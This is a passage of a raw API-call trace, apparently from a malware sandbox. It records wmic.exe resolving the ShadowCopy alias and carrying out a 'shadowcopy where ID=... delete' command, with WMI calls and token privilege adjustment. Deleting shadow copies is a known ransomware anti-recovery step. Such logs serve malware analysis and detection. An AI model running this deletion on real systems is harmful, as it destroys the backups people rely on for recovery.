0x2 [0113.687] malloc (_Size=0x20) returned 0x15cef0 [0113.687] lstrlenW (lpString="/") returned 1 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0113.687] lstrlenW (lpString="-") returned 1 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0113.687] lstrlenW (lpString="CLASS") returned 5 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0113.687] lstrlenW (lpString="PATH") returned 4 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0113.687] lstrlenW (lpString="CONTEXT") returned 7 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] malloc (_Size=0x16) returned 0x15cb40 [0113.688] lstrlenW (lpString="shadowcopy") returned 10 [0113.688] GetCurrentThreadId () returned 0xb10 [0113.688] ??0CHString@@QEAA@XZ () returned 0x1ef960 [0113.688] malloc (_Size=0x18) returned 0x15cae0 [0113.688] malloc (_Size=0x18) returned 0x15cb80 [0113.688] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ce1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d2998 | out: ppNamespace=0xff4d2998*=0x1cf3a98) returned 0x0 [0113.704] free (_Block=0x15cb80) [0113.704] free (_Block=0x15cae0) [0113.704] CoSetProxyBlanket (pProxy=0x1cf3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.704] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.704] GetCurrentThreadId () returned 0xb10 [0113.704] ??0CHString@@QEAA@XZ () returned 0x1ef7f8 [0113.704] malloc (_Size=0x18) returned 0x15cae0 [0113.704] malloc (_Size=0x18) returned 0x15cb80 [0113.704] malloc (_Size=0x18) returned 0x15cba0 [0113.704] malloc (_Size=0x18) returned 0x15cbc0 [0113.704] SysStringLen (param_1="root\\cli") returned 0x8 [0113.704] SysStringLen (param_1="\\") returned 0x1 [0113.704] malloc (_Size=0x18) returned 0x15cbe0 [0113.704] SysStringLen (param_1="root\\cli\\") returned 0x9 [0113.704] SysStringLen (param_1="ms_409") returned 0x6 [0113.704] free (_Block=0x15cbc0) [0113.704] free (_Block=0x15cba0) [0113.705] free (_Block=0x15cb80) [0113.705] free (_Block=0x15cae0) [0113.705] malloc (_Size=0x18) returned 0x15cae0 [0113.705] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ce1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d29a0 | out: ppNamespace=0xff4d29a0*=0x1cf3b28) returned 0x0 [0113.708] free (_Block=0x15cae0) [0113.708] free (_Block=0x15cbe0) [0113.708] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.708] GetCurrentThreadId () returned 0xb10 [0113.708] ??0CHString@@QEAA@XZ () returned 0x1ef970 [0113.708] malloc (_Size=0x18) returned 0x15cbe0 [0113.709] malloc (_Size=0x18) returned 0x15cae0 [0113.709] malloc (_Size=0x18) returned 0x15cb80 [0113.709] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0113.709] malloc (_Size=0x3a) returned 0x15cfa0 [0113.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff461980, cbMultiByte=-1, lpWideCharStr=0x15cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0113.709] free (_Block=0x15cfa0) [0113.709] malloc (_Size=0x18) returned 0x15cba0 [0113.709] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0113.709] SysStringLen (param_1="shadowcopy") returned 0xa [0113.709] malloc (_Size=0x18) returned 0x15cbc0 [0113.709] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0113.709] SysStringLen (param_1="'") returned 0x1 [0113.709] free (_Block=0x15cba0) [0113.709] free (_Block=0x15cb80) [0113.709] free (_Block=0x15cae0) [0113.709] free (_Block=0x15cbe0) [0113.709] IWbemServices:GetObject (in: This=0x1cf3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1ef978*=0x0, ppCallResult=0x0 | out: ppObject=0x1ef978*=0x1d004e0, ppCallResult=0x0) returned 0x0 [0113.714] malloc (_Size=0x18) returned 0x15cbe0 [0113.715] IWbemClassObject:Get (in: This=0x1d004e0, wszName="Target", lFlags=0, pVal=0x1ef8a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4d2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef8a0*(varType=0x8, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.715] free (_Block=0x15cbe0) [0113.715] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.715] malloc (_Size=0x3e) returned 0x15cfa0 [0113.715] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.715] malloc (_Size=0x18) returned 0x15cbe0 [0113.715] IWbemClassObject:Get (in: This=0x1d004e0, wszName="PWhere", lFlags=0, pVal=0x1ef8a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ae298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef8a0*(varType=0x8, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.715] free (_Block=0x15cbe0) [0113.715] lstrlenW (lpString=" Where ID = '#'") returned 15 [0113.715] malloc (_Size=0x20) returned 0x15cff0 [0113.715] lstrlenW (lpString=" Where ID = '#'") returned 15 [0113.715] malloc (_Size=0x18) returned 0x15cbe0 [0113.715] IWbemClassObject:Get (in: This=0x1d004e0, wszName="Connection", lFlags=0, pVal=0x1ef8a0*(varType=0x0, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fbd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef8a0*(varType=0xd, wReserved1=0xff4d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d009c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.715] free (_Block=0x15cbe0) [0113.715] IUnknown:QueryInterface (in: This=0x1d009c0, riid=0xff467360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1ef890 | out: ppvObject=0x1ef890*=0x1d009c0) returned 0x0 [0113.715] GetCurrentThreadId () returned 0xb10 [0113.715] ??0CHString@@QEAA@XZ () returned 0x1ef7b8 [0113.715] malloc (_Size=0x18) returned 0x15cbe0 [0113.715] IWbemClassObject:Get (in: This=0x1d009c0, wszName="Namespace", lFlags=0, pVal=0x1ef7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff47738f, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.716] free (_Block=0x15cbe0) [0113.716] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0113.716] malloc (_Size=0x16) returned 0x15cbe0 [0113.716] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0113.716] malloc (_Size=0x18) returned 0x15cae0 [0113.716] IWbemClassObject:Get (in: This=0x1d009c0, wszName="Locale", lFlags=0, pVal=0x1ef7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.716] free (_Block=0x15cae0) [0113.716] lstrlenW (lpString="ms_409") returned 6 [0113.716] malloc (_Size=0xe) returned 0x15cae0 [0113.716] lstrlenW (lpString="ms_409") returned 6 [0113.716] malloc (_Size=0x18) returned 0x15cb80 [0113.716] IWbemClassObject:Get (in: This=0x1d009c0, wszName="User", lFlags=0, pVal=0x1ef7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.716] free (_Block=0x15cb80) [0113.716] malloc (_Size=0x18) returned 0x15cb80 [0113.716] IWbemClassObject:Get (in: This=0x1d009c0, wszName="Password", lFlags=0, pVal=0x1ef7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.716] free (_Block=0x15cb80) [0113.716] malloc (_Size=0x18) returned 0x15cb80 [0113.716] IWbemClassObject:Get (in: This=0x1d009c0, wszName="Server", lFlags=0, pVal=0x1ef7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.716] free (_Block=0x15cb80) [0113.716] lstrlenW (lpString=".") returned 1 [0113.716] malloc (_Size=0x4) returned 0x157140 [0113.716] lstrlenW (lpString=".") returned 1 [0113.716] malloc (_Size=0x18) returned 0x15cb80 [0113.717] IWbemClassObject:Get (in: This=0x1d009c0, wszName="Authority", lFlags=0, pVal=0x1ef7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0x15cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.717] free (_Block=0x15cb80) [0113.717] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.717] IUnknown:Release (This=0x1d009c0) returned 0x1 [0113.717] GetCurrentThreadId () returned 0xb10 [0113.717] ??0CHString@@QEAA@XZ () returned 0x1ef7b8 [0113.717] malloc (_Size=0x18) returned 0x15cb80 [0113.717] IWbemClassObject:Get (in: This=0x1d004e0, wszName="__RELPATH", lFlags=0, pVal=0x1ef7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0113.717] free (_Block=0x15cb80) [0113.717] malloc (_Size=0x18) returned 0x15cb80 [0113.717] GetCurrentThreadId () returned 0xb10 [0113.717] ??0CHString@@QEAA@XZ () returned 0x1ef638 [0113.717] ??0CHString@@QEAA@PEBG@Z () returned 0x1ef650 [0113.717] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1ef5e0 [0113.717] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0113.717] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x15d020 [0113.717] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0113.717] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1ef5a0 [0113.717] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1ef5e8 [0113.717] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef650 [0113.717] ??1CHString@@QEAA@XZ () returned 0x38583501 [0113.717] ??1CHString@@QEAA@XZ () returned 0x38583501 [0113.717] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1ef5a8 [0113.717] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef5e0 [0113.718] ??1CHString@@QEAA@XZ () returned 0x1 [0113.718] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x15d090 [0113.718] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0113.718] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1ef5a0 [0113.718] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1ef5e8 [0113.718] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef650 [0113.718] ??1CHString@@QEAA@XZ () returned 0x38583501 [0113.718] ??1CHString@@QEAA@XZ () returned 0x38583501 [0113.718] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1ef5a8 [0113.718] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef5e0 [0113.718] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.718] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0113.718] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.718] malloc (_Size=0x18) returned 0x15cba0 [0113.718] malloc (_Size=0x18) returned 0x15cc00 [0113.718] malloc (_Size=0x18) returned 0x15cc20 [0113.718] malloc (_Size=0x18) returned 0x15cc40 [0113.718] malloc (_Size=0x18) returned 0x15cc60 [0113.718] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0113.718] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0113.718] malloc (_Size=0x18) returned 0x15cc80 [0113.718] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0113.718] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0113.718] malloc (_Size=0x18) returned 0x15cca0 [0113.718] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0113.718] SysStringLen (param_1="\"") returned 0x1 [0113.719] free (_Block=0x15cc80) [0113.719] free (_Block=0x15cc60) [0113.719] free (_Block=0x15cc40) [0113.719] free (_Block=0x15cc20) [0113.719] free (_Block=0x15cc00) [0113.719] free (_Block=0x15cba0) [0113.719] IWbemServices:GetObject (in: This=0x1cf3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1ef628*=0x0, ppCallResult=0x0 | out: ppObject=0x1ef628*=0x1d00a50, ppCallResult=0x0) returned 0x0 [0113.720] malloc (_Size=0x18) returned 0x15cba0 [0113.720] IWbemClassObject:Get (in: This=0x1d00a50, wszName="Text", lFlags=0, pVal=0x1ef660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4d2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef660*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x324aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ae030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0113.720] free (_Block=0x15cba0) [0113.720] SafeArrayGetLBound (in: psa=0x324aa0, nDim=0x1, plLbound=0x1ef640 | out: plLbound=0x1ef640) returned 0x0 [0113.720] SafeArrayGetUBound (in: psa=0x324aa0, nDim=0x1, plUbound=0x1ef630 | out: plUbound=0x1ef630) returned 0x0 [0113.720] SafeArrayGetElement (in: psa=0x324aa0, rgIndices=0x1ef624, pv=0x1ef678 | out: pv=0x1ef678) returned 0x0 [0113.721] malloc (_Size=0x18) returned 0x15cba0 [0113.721] malloc (_Size=0x18) returned 0x15cc00 [0113.721] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0113.721] free (_Block=0x15cba0) [0113.721] IUnknown:Release (This=0x1d00a50) returned 0x0 [0113.721] free (_Block=0x15cca0) [0113.721] ??1CHString@@QEAA@XZ () returned 0x38583501 [0113.721] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.721] free (_Block=0x15cb80) [0113.721] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.721] lstrlenW (lpString="Shadow copy management.") returned 23 [0113.721] malloc (_Size=0x30) returned 0x1585c0 [0113.721] lstrlenW (lpString="Shadow copy management.") returned 23 [0113.721] free (_Block=0x15cc00) [0113.721] IUnknown:Release (This=0x1d004e0) returned 0x0 [0113.721] free (_Block=0x15cbc0) [0113.721] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.721] lstrlenW (lpString="PATH") returned 4 [0113.721] lstrlenW (lpString="where") returned 5 [0113.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0113.721] lstrlenW (lpString="WHERE") returned 5 [0113.721] lstrlenW (lpString="where") returned 5 [0113.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0113.721] lstrlenW (lpString="/") returned 1 [0113.721] lstrlenW (lpString="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 43 [0113.721] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0113.721] lstrlenW (lpString="-") returned 1 [0113.722] lstrlenW (lpString="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 43 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0113.722] lstrlenW (lpString="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 43 [0113.722] malloc (_Size=0x58) returned 0x15d020 [0113.722] lstrlenW (lpString="ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 43 [0113.722] lstrlenW (lpString="/") returned 1 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0113.722] lstrlenW (lpString="-") returned 1 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] malloc (_Size=0xe) returned 0x15cbc0 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] lstrlenW (lpString="GET") returned 3 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0113.722] lstrlenW (lpString="LIST") returned 4 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0113.722] lstrlenW (lpString="SET") returned 3 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0113.722] lstrlenW (lpString="CREATE") returned 6 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0113.722] lstrlenW (lpString="CALL") returned 4 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0113.722] lstrlenW (lpString="ASSOC") returned 5 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0113.722] lstrlenW (lpString="DELETE") returned 6 [0113.722] lstrlenW (lpString="delete") returned 6 [0113.722] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0113.723] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.723] malloc (_Size=0x3e) returned 0x15d080 [0113.723] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0113.723] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0113.723] malloc (_Size=0x18) returned 0x15cc00 [0113.723] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0113.723] lstrlenW (lpString="FROM") returned 4 [0113.723] lstrlenW (lpString="*") returned 1 [0113.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0113.723] malloc (_Size=0x18) returned 0x15cb80 [0113.723] free (_Block=0x15cc00) [0113.723] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0113.723] lstrlenW (lpString="FROM") returned 4 [0113.723] lstrlenW (lpString="from") returned 4 [0113.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0113.723] malloc (_Size=0x18) returned 0x15cc00 [0113.723] free (_Block=0x15cb80) [0113.723] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0113.723] malloc (_Size=0x18) returned 0x15cb80 [0113.723] free (_Block=0x15cc00) [0113.723] free (_Block=0x15d080) [0113.723] free (_Block=0x15cb80) [0113.723] lstrlenW (lpString="SET") returned 3 [0113.723] lstrlenW (lpString="delete") returned 6 [0113.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0113.723] lstrlenW (lpString="CREATE") returned 6 [0113.723] lstrlenW (lpString="delete") returned 6 [0113.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0113.724] free (_Block=0x15cef0) [0113.724] malloc (_Size=0x8) returned 0x156f20 [0113.724] lstrlenW (lpString="GET") returned 3 [0113.724] lstrlenW (lpString="delete") returned 6 [0113.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0113.724] lstrlenW (lpString="LIST") returned 4 [0113.724] lstrlenW (lpString="delete") returned 6 [0113.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0113.724] lstrlenW (lpString="ASSOC") returned 5 [0113.724] lstrlenW (lpString="delete") returned 6 [0113.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0113.724] WbemLocator:IUnknown:AddRef (This=0x1ce1390) returned 0x3 [0113.724] free (_Block=0x38dfb0) [0113.724] lstrlenW (lpString="") returned 0 [0113.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0113.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.724] malloc (_Size=0x14) returned 0x15cb80 [0113.724] lstrlenW (lpString="XDUWTFONO") returned 9 [0113.724] GetCurrentThreadId () returned 0xb10 [0113.724] GetCurrentProcess () returned 0xffffffffffffffff [0113.724] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1efa00 | out: TokenHandle=0x1efa00*=0x27c) returned 1 [0113.724] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ef9f8 | out: TokenInformation=0x0, ReturnLength=0x1ef9f8) returned 0 [0113.724] malloc (_Size=0x118) returned 0x15d080 [0113.724] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x15d080, TokenInformationLength=0x118, ReturnLength=0x1ef9f8 | out: TokenInformation=0x15d080, ReturnLength=0x1ef9f8) returned 1 [0113.724] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x15d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-648529986, Attributes=0x49e), (Luid.LowPart=0x0, Luid.HighPart=1429232, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0113.725] free (_Block=0x15d080) [0113.725] CloseHandle (hObject=0x27c) returned 1 [0113.725] lstrlenW (lpString="GET") returned 3 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0113.725] lstrlenW (lpString="LIST") returned 4 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0113.725] lstrlenW (lpString="SET") returned 3 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0113.725] lstrlenW (lpString="CALL") returned 4 [0113.725] lstrlenW (lpString="delete") returned 6 [0113.725] CompareStringW (Locale=0x800, 